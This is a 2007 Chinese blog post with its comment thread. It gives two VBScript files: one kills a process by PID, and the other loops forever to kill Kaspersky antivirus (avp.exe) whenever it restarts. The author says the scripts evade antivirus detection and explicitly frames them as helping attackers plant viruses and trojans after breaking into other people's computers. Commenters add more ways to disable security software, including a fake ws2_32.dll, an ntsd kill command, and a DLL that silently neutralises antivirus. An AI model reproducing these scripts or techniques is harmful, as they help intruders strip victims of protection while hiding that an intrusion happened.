百度空间 | 百度首页 
               
 
查看文章
 
两个简易VBS脚本结束进程与防止进程启动
2007-03-20 18:44

今天下午没课,躲进私人空间开始思考些问题。在浏览VBS相关案例时,自己写了两个小程序出来,有Hack性质的(其实只要能“借刀杀人”,什么软件没黑客性质?- -!)。Kill.vbs用来在cmd下结束进程,Dis.vbs用来在窗口模式下防止某进程再次启动。这两个VBS都不会被杀毒软件KILL掉,并且有一定的隐蔽性……看代码!('为注释)

Kill.vbs:

for each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_ '涉及到WMI脚本入侵技术,我不能解释清楚!
if ps.handle=wscript.arguments(0) then  '判断进程的PID号是否与获得的PID号参数相等
wscript.echo ps.terminate '如果相等就结束指定PID号对应的进程
end if
next

Dis.vbs

dim y,x '不要这行也行……
do '来个死循环……一直在判断!do ... loop内为循环体!
set y=getobject("winmgmts:\\.\root\cimv2") '和上面解释一样,这也是涉及到微软的WMI技术!
set x=y.execquery("select * from win32_process where name='avp.exe'")
'查询语句,where后判断avp.exe(卡巴)是否存在进程中!
'这样当卡巴被上面的Kill.vbs结束时就再也启动不起来了。除非,把Dis.vbs结束了先……
for each i in x
i.terminate()  '卡巴要启动马上就终止……
next
wscript.sleep
loop

解释够清楚了,那就来看看这两个vbs是如何工作的吧。我将Kill.vbs与Dis.vbs放在C盘根目录下。

打开cmd,输入cd\回到C盘根目录下,输入tasklist查看当前系统的进程情况,然后记下你想kill的进程的PID号,输入cscript Kill.vbs 2200即可结束PID为2200的进程了!假如这个进程是avp.exe,那你就可以输入Dis.vbs启动Dis.vbs来防止卡巴继续被启动。Dis.vbs启动时仅在任务管理器的进程中有wscript.exe进程项,要是不结束这个进程是无法再次启动卡巴的。

懂得这些,为以后入侵他人电脑后上传病毒、木马之类的就更方便了一点点……上面的所有过程都经本人试验成功了,继续完善……


类别:Script Attack | 添加到搜藏 | 浏览() | 评论 (26)
 
最近读者:
 
网友评论:
1
2007-03-20 19:00 | 回复
ws2_32.dll 在程序目录里建立这个也能组织程序运行
 
2
2007-03-20 19:01 | 回复
阻止.
 
3
2007-03-20 19:15 | 回复
我晕了,果然啊!建立个记事本改名为ws2_32.dll,就……好,记下啦!呵呵……
 
4
2007-03-20 21:21 | 回复
运行程序会在WINDOWS目录寻找这个接口文件.但是会先在程序目录先搜索一遍
 
5
2007-03-20 21:25 | 回复
都是强人!!认真学习!!!
 
6
2007-03-20 21:43 | 回复
接口文件?你的意思是:任何程序都必须寻找它了?调用这个库文件吧?删了它就真正麻烦了…… to bark: study together ~~~
 
7
2007-03-20 22:37 | 回复
嗯.
 
8
2007-03-21 16:30 | 回复
都是强人!!认真学习+++
 
9
2007-03-21 20:07 | 回复
我一直用第三方软件hook api隐藏卡巴……
 
10
2007-03-21 20:12 | 回复
"打开cmd,输入cd\回到C盘根目录下......" 好无聊的一个操作……可以直接tasklist的,干啥非跑去c不可?look at this: ntsd -c q -p $PID$
 
11
2007-03-21 20:15 | 回复
其实结束卡巴不好,这样用户就知道被入侵了,最好是加载一个特制dll让卡巴表面正常,实际失效,但是很抱歉,我不能把这个bt的dll公布,太有危害了。
 
12
2007-03-21 20:59 | 回复
"打开cmd,输入cd\回到C盘根目录下......"这个不要当然也行了。 我把那两个脚本都放在C盘根目录,这样是为了后面调用方便……无语……不是为了tasklist而到C根目录下的!!唉!我可好无聊啊…… 我这一时兴起而写的VBS当然不会强到何地步啦?真的要入侵,我都不会用自己目前写的这个……至于那个dll我没兴趣,汗……没必要抱歉的!
 
13
2007-03-21 21:04 | 回复
不过你可以私下给我那个dll,我见识下它的威力!放心,我会保密的啦……
 
14
2007-03-21 22:12 | 回复
作者不是我,不过我捕获了它,并且学会了用法,不知这是哪位牛人的杰作…… 你要的话,自己装个卡巴,把系统防御统统去掉,说不定这位牛人会看中你^_^
 
15
2007-03-22 12:31 | 回复
我的电脑什么都没。。。连补丁都不打,从来不怕什么黑东西进来……估计没这个机会了……
 
16
2007-03-22 14:33 | 回复
ws2_32.dll 的办法不通用,如果程序没有调用 WinSock 这个就没用了。
 
17
2007-03-22 14:50 | 回复
哦,多谢哈!
 
18
2007-03-22 23:42 | 回复
VBS和VB什么区别 ?
 
19
2007-03-23 11:43 | 回复
VBS为WSH(WINDOWS脚本宿主)的一种脚本语言,语法和VB基本上是一样.就像动态网站开发时ASP所支持的VBSCRIPT是在开发动态网站服务端的脚本语言一样,也和VB语法是一样的.也许可以说成它们都是VB的脚本语言吧.只是它们作用的环境不一样.
 
20
2007-03-24 01:41 | 回复
... 太专业了哈~~
 
21
2007-03-24 01:50 | 回复
认真~~ 表扬一个~~
 
22
2007-03-26 17:21 | 回复
很不错 顶个
 
23
2007-04-10 16:05 | 回复
ws2_32.dll 应该是和网络相关的程序 才有此bug
 
24
2007-11-10 21:37 | 回复
若能再讲一下微软的WMI技术就更好了
 
25
2007-11-29 15:20 | 回复
牛人无处不在.
 
26
2007-12-31 10:47 | 回复
我的电脑里什么都没有,上百个补丁也没打,装好系统后就装了个冰点,什么时候冰点有人能破译了,我再装杀毒软件,不过看了好多文章,什么都没有学到,存在很多的技术问题,大家可以一起交流吗?或大家可以建一个群,高手和牛人都在那里一起学习,技术是学不完的,我也在黑客网站混了两三年了,都没有学到什么好的。我的邮箱是yyqmgler@163.com或大家可以一起学习,到时创一个好的学习圈子,我的QQ:200595870一起学习的加我,www.sdasos.cn自己做的网站,到时一起学习,
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu